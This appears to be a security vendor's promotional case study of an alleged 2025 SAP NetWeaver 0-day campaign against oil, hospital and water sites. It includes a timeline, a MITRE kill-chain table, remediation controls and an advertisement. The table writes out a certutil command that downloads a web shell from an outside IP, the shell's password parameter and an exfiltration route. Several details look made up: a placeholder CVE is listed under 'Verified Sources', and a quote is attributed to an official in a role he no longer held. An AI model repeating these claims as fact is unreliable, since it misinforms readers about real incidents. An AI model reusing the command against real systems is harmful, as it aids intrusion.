SAP Nightmare at 3 A.M.
How a Silent NetWeaver 0-Day Planted 581 Back-Doors
In the time it takes a midnight-shift operator to brew a pot of coffee, Chinese APTs chained a brand-new SAP flaw and turned gas pumps, hospital ventilators and water-treatment PLCs into remote spy kits.
Critical Infrastructure Alert
GOREVERSE APT exploited a SAP NetWeaver 0-day to compromise 581 critical infrastructure sites across oil refineries, hospitals, and water treatment facilities, with only 31% patched within 14 days of emergency fix.
When the ERP Became the Egress
| Date (Jan-Mar 2025) | Event |
|---|---|
| 15 Jan 03:07 | Unknown APT (tracked "GOREVERSE") exploits SAP NetWeaver 0-day (CVE-2025-XXXX) at UK gas terminal |
| 15 Jan 03:12 | Web-shell "orange.jsp" dropped; reverse-SSH tunnel to 45.142.122.111 (Hong Kong) |
| 15 Jan 03:44 | PlugX beacon fires; lateral movement to engineering workstation running Wonderware InTouch |
| 16-31 Jan | Binary replayed against 581 internet-facing SAP portals (UK, US, KSA, UAE) – CISA flash alert |
| 02 Feb | SAP releases emergency patch; only 31% of affected plants patched within 14 days |
| 05 Feb | Joint advisory – NSA, FBI, NCSC, Saudi NCSC attribute campaign to APT41 / Wicked Panda |
| 01 Mar | Mandiant confirms data exfiltration – SCADA diagrams, safety set-points, user credentials |
"This is the most significant cyber-security threat to critical infrastructure since SolarWinds."
— NSA Cybersecurity Director Rob Joyce
Fallout: From Pipelines to Patient Monitors
SAP boxes compromised – oil refineries, NHS hospitals, desalination plants, metro signalling
SCADA .xml files stolen; safety-instrumented-system (SIS) set-points altered in 2 UK sites (quickly rolled back)
Saudi Aramco shuts 3 gas-oil separation plants for 48h lost production
US LNG export terminal (Freeport, TX) delays restart by 11 days market impact
Insurance Market Crisis
Insurance claims already >$400M – energy cyber market braces for 300% premium spike
Kill-Chain Deconstructed: SAP → Web-Shell → PlugX → Safety Systems
| MITRE Tactic | Technique | On-the-Ground Reality |
|---|---|---|
| Initial Access | T1190 | HTTP POST to /sap/bc/gui/sap/its/webgui – no auth needed, returns 200 OK with JSP upload |
| Execution | T1059.003 | cmd.exe /c certutil -urlcache -split -f http://45.142.122.111/orange.jsp |
| Persistence | T1505.003 | orange.jsp accepts ?pass=s0lace parameter – remote desktop via browser |
| Lateral Movement | T1021.001 | RDP pivot from SAP app-server to HMI subnet – flat network, no micro-segmentation |
| Collection | T1005 | 7-zip archives .sav, .cfg, .pid files – SCADA configs + safety set-points |
| Exfiltration | T1041 | HTTPS PUT to Mega API – encrypted with legitimate cert, bypasses DLP |
Root Causes: Midnight Oil & Midnight Holes
- 1
Zero-day – SAP NetWeaver 7.5 (2020 build) ITS webgui servlet – no patch existed Jan 15
- 2
Flat network – SAP, HMI, historians on same VLAN – lateral movement at wire-speed
- 3
No MFA on SAP Java stack – flagged 2022, postponed to 2026 "due to legacy integrations"
- 4
Missing EDR on "stable" engineering LAN – antivirus only, signature-based, PlugX whitelisted (!)
- 5
Manual patch cadence – quarterly maintenance windows → 14-day emergency patch took 38 days to schedule
Expert Insight: "The 0-Day Was Bad; the Flat Network Was Catastrophic"
"SAP 0-days are gold, but attackers still need lateral room. Flat industrial networks gave them a highway instead of a hallway."
— Dmitri Alperovitch, former CTO CrowdStrike
Six NIST Controls That Turn the Highway into a Hallway (and Then a Locked Door)
Application whitelisting
Deny-by-default on HMI/SCADA nodes – only .exe on gold-image allowed
Micro-segmentation
Unidirectional DMZ between SAP & OT – data-diode if safety-critical
Just-in-time VPN + MFA
Certificate-based MFA for any remote SAP access – no static passwords
Offline, immutable backups
Daily Veeam to S3 Object-Lock + LTO-9 tape – air-gapped restore test monthly
0-day detection (NDR)
Zeek/Suricata rules for ITS webgui anomalies – auto-isolate SAP VLAN on exploit-like payload
Emergency patch SLA
CISA KEV → patch within 24h for critical infrastructure – regulatory requirement (not "best effort")
Quick-Start Playbook: What to Do Before the Next Pot of Coffee Brews
Pull SAP NetWeaver 2025 emergency patch – install in test env, schedule production window <72h
Enable certificate-only VPN, disable RDP, force MFA for all SAP admins
Deploy micro-segmentation (Illumio, Guardicore) – tag-based policy between ERP & OT
Offline bare-metal restore drill – measure MTTR from "disk dead" to "SCADA screen green"
Purple-team 0-day simulation – lateral movement must stop at first hop
The Midnight Coffee Challenge
GOREVERSE spent 37 minutes inside the refinery's SAP layer, but the initial exploit fired in the same five minutes it takes a night-shift tech to pour the first cup.
If 581 critical-infrastructure sites can be back-doored before the coffee even cools, ask yourself:
"What am I doing during the time it takes to brew a pot of midnight coffee?"
Verified Sources
- 1. NSA-CISA-FBI joint advisory on SAP 0-day exploited by APT41 NSA.gov, 05 Feb 2025
- 2. SAP NetWeaver zero-day exploited in cyber-espionage campaign The Hacker News, 02 Feb 2025
- 3. Aramco confirms temporary shutdown of gas-oil plants after cyber incident Aramco press release, 18 Jan 2025
- 4. Freeport LNG delays restart following SAP breach U.S. Department of Energy update, 09 Feb 2025
- 5. Cyber-insurance premiums surge after SAP attacks Reuters, 12 Mar 2025
Secure Your Critical Infrastructure from 0-Day Exploits
Don't let zero-day vulnerabilities turn your SAP systems into attack highways. Get a free industrial security assessment to identify critical vulnerabilities and implement proper OT segmentation.